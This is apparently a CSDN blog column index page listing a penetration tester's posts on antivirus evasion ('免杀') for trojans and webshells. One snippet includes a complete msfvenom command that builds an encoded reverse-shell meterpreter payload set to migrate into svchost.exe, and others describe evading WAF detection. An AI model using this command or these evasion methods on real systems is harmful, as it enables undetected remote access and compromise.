![](https://img-blog.csdnimg.cn/20200525162109931.jpg?x-oss-process=image/resize,m_fixed,h_224,w_224)
免杀专栏
文章平均质量分 94
免杀专栏
谢公子
《域渗透攻防指南》作者,国内知名攻防渗透专家。一个小帅哥,热爱技术,追求完美,有追求!擅长渗透测试、红蓝对抗、内网渗透、域渗透、云安全。
展开
-
基于SharpShooter进行木马免杀
SharpShooter项目地址:https://github.com/mdsecactivebreach/SharpShooter未完待续原创 2020-07-10 11:28:24 · 1527 阅读 · 0 评论 -
MSF木马的免杀(三)
目录MSF木马的免杀MSF木马的免杀MSF下输入,生成免杀shellcodemsfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=x.x.x.x LPORT=8888 -e x86/shikata_ga_nai -i 15 -b '\x00\' PrependMigrate=true PrependMigrateProc=svchost.exe -f c > shellcode.c这原创 2020-05-26 09:43:30 · 9046 阅读 · 0 评论 -
浅谈木马免杀(一)
免杀免杀技术全称为反杀毒技术Anti Anti- Virus(AV)简称“免杀”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广,其中包含反汇编、逆向工程、系统漏洞等黑客技术。其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。在实际的渗透过程中,目标机器上一般会有杀毒软件。如Windows Defender、360安全卫士、腾讯电脑管家...原创 2020-04-27 15:56:04 · 5591 阅读 · 1 评论 -
webshell脚本的免杀(二)
脚本木马的免杀Web端木马一般是中国菜刀的一句话木马、中国蚁剑马、冰蝎马、还有各种各样脚本的大马。Web端木马的查杀一般是WAF通过分析流量来进行截断。在WAF的规则里面有这些木马的流量特征,只要WAF匹配到了木马的流量特征,就会对木马请求的流量进行截断丢弃。所以,Web端木马免杀实质就是要对木马通信流量做混淆,以达到WAF匹配不到该木马流量的目的。目前,像中国菜刀、中国蚁剑这种木马,其通信流量是很容易被WAF给检测到的。而冰蝎是目前最流行的Web木马,其通过动态二进制加密流量,可以躲避很多WAF的查杀原创 2020-05-28 10:00:00 · 2525 阅读 · 0 评论